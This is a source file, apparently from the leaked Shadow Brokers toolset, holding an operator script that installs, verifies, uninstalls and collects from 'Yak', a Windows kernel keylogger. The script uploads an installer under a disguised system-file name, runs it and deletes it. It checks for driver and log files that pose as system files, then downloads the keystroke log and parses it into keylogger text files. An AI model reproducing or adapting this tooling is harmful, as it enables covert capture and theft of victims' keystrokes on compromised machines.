shadowbrokers-exploits/windows/Resources/Ep/Scripts/Yak.eps

245 lines
7.3 KiB
PostScript
Raw Normal View History

#--------------------------------------------------------
# File: Yak.eps
#
# Script to install/uninstall/collect Yak
#--------------------------------------------------------
@include "_FileExists.epm";
@include "_GenericFunctions.epm";
@echo off;
@case-sensitive off;
#--------------------------------------------------------
# Get path that EP scripts are run out of
#--------------------------------------------------------
string $ScriptsDir;
_GetEPScriptsPath($ScriptsDir);
int $menuOption;
string $localPath = "$ScriptsDir\\..\\..\\..\\tools\\yak";
string $yakUploadFile = "yak_min_install.exe";
string $localInstallPath = "$localPath\\$yakUploadFile";
string $localParsePath = "$localPath\\yak.exe";
string $fileName = "help16.exe";
#--------------------------------------------------------
# Get system path
#--------------------------------------------------------
string $systemPath;
ifnot (_GetSystemPath($systemPath)) {
return false;
}
#--------------------------------------------------------
# Check to see if help16.exe exists on the target (shouldn't)
#--------------------------------------------------------
if (_FileExists ($fileName, "$systemPath")) {
$fileName = "winhlp16.exe";
}
echo "";
if($argc > 1){
if($argv[1] == "INSTALL"){
return YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is");
}
else if ($argv[1] == "UNINSTALL"){
return YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u");
}
else if ($argv[1] == "VERIFY"){
return YakVerify($systemPath);
}
else if ($argv[1] == "COLLECT"){
ifnot(YakCollect($systemPath, $localParsePath)){
echo "Collection and parsing could not be completed, please finish manually";
return false;
}
}
else{
ifnot( $argv[1] == "?"){
echo "$argv[1] is not a valid argument";
}
YakUsage();
return false;
}
}
while (true) {
echo "- Yak";
# print the command list
echo "";
echo " (0). Exit";
echo " (1). Install";
echo " (2). Uninstall";
echo " (3). Verify Install/Uninstall";
echo " (4). Collect and Parse";
echo "";
$menuOption = GetInput("Enter the desired option");
if ($menuOption == 0) {
#--------------------------------------------------------
# Quit
#--------------------------------------------------------
return true;
} else if ($menuOption == 1) {
YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is");
} else if ($menuOption == 2) {
YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u");
} else if ($menuOption == 3) {
YakVerify($systemPath);
} else if ($menuOption == 4) {
ifnot(YakCollect($systemPath, $localParsePath)){
echo "Collection and parsing could not be completed, please finish manually";
}
} else {
#--------------------------------------------------------
# Invalid menuOption
#--------------------------------------------------------
echo "*** Invalid menuOption ***";
}
pause;
}
return false;
Sub YakUsage()
{
echo "Usage: yak [arg]";
echo " Runs Yak Script to perform Yak install, uninstall, verification, or collect";
echo "";
echo "Arguments:";
echo " [arg]";
echo " (optional) performs a specific Yak task and returns. ";
echo " (INSTALL|UNINSTALL|VERIFY|COLLECT)";
echo "";
return true;
}
Sub YakInstall(IN string $localInstallPath, IN string $YakUploadFile, IN string $systemPath, IN string $fileName, IN string $command)
{
echo "!!! THIS IS THE OLD VERSION OF YAK, YOU PROBABLY SHOULDN'T INSTALL IT!!!";
if ($command == "-is") {
ifnot (prompt "Are you sure you want to proceed?") {
return false;
} else {
echo "You didn't just actually try to do this, did you?";
return false;
}
}
bool $success = true;
#--------------------------------------------------------
# Install Yak - upload and run with -is option
#--------------------------------------------------------
echo "Uploading $YakUploadFile to $systemPath\\$fileName";
ifnot(`put $localInstallPath -name "$systemPath\\$fileName"`){
echo "Could not put $fileName into $systemPath";
$success = false;
}else{
echo "";
echo "Running $fileName on target...\n";
@echo on;
ifnot(`run -command "$systemPath\\$fileName $command" -redirect`)
{
@echo off;
echo "Could not run $systemPath\\$fileName $command";
$success = false;
}
}
@echo off;
echo "";
echo "Deleting $systemPath\\$fileName";
ifnot(`del $fileName -path $systemPath`){
echo "Could not delete $systemPath\\$fileName";
echo "Please delete it manually";
}
return $success;
}
Sub YakVerify(IN string $systemPath)
{
#--------------------------------------------------------
# Check to see if yak files exist
#--------------------------------------------------------
bool $logSuccessFlag = true;
bool $driverSuccessFlag = true;
bool $success = true;
if (_FileExists ("ntiopa.sys", "$systemPath")) {
echo "ntiopa.sys log file exists ... SUCCESSFUL";
} else {
echo "ntiopa.sys log file missing ... FAILED";
$logSuccessFlag = false;
echo ""; }
if (_FileExists ("kbpnp.sys", "$systemPath\\drivers")) {
echo "kbpnp.sys driver exists ... SUCCESSFUL";
} else {
echo "kbpnp.sys driver missing ... FAILED";
$driverSuccessFlag = false;
}
echo "";
if (($logSuccessFlag == true) && ($driverSuccessFlag == true)) {
echo "YAK properlly installed on target";
} else if ((($logSuccessFlag == true) && ($driverSuccessFlag == false)) ||
(($logSuccessFlag == false) && ($driverSuccessFlag == true))) {
echo "YAK is in a bad state...need a reboot before it's functional";
$success = false;
} else {
echo "YAK doesn't exist on target!";
$success = false;
}
return $success;
}
Sub YakCollect(IN string $systemPath, IN string $localParsePath)
{
bool $success = true;
#--------------------------------------------------------
# Download Yak and Parse the local file
#--------------------------------------------------------
echo "Getting $systemPath\\ntiopa.sys...";
echo "";
@record on;
ifnot(`copyget "$systemPath\\ntiopa.sys"`){
echo "Could not copyget $systemPath\\ntiopa.sys";
@record off;
return false;
}
@record off;
string $localName = GetCmdData("LocalName");
string $temp = split("_", $localName);
int $counter = 1;
string $fileDate = "";
while ($counter < sizeOf($temp)) {
$fileDate = "$fileDate\_$temp[$counter]";
$counter++;
}
echo "";
echo "Moving file to NOSEND directory...";
`local mkdir Get_Files\\NOSEND`;
ifnot(`local move Get_Files\\$localName Get_Files\\NOSEND\\$localName`){
echo "Could not move Get_Files\\$localName into Get_Files\\NOSEND\\$localName";
return false;
}
echo "";
echo "Parsing file...";
ifnot(`local run -command "$localParsePath -tu -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger$fileDate.txt"`){
echo "Could not run $localParsePath -tu -i";
$success = false;
}
ifnot(`local run -command "$localParsePath -tau -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger_scancodes$fileDate.txt"`){
echo "Could not run $localParsePath -tau -i";
$success = false;
}
sleep 3000;
@echo on;
`local dir *$fileDate* -path "Get_Files\\NOSEND"`;
@echo off;
return $success;
}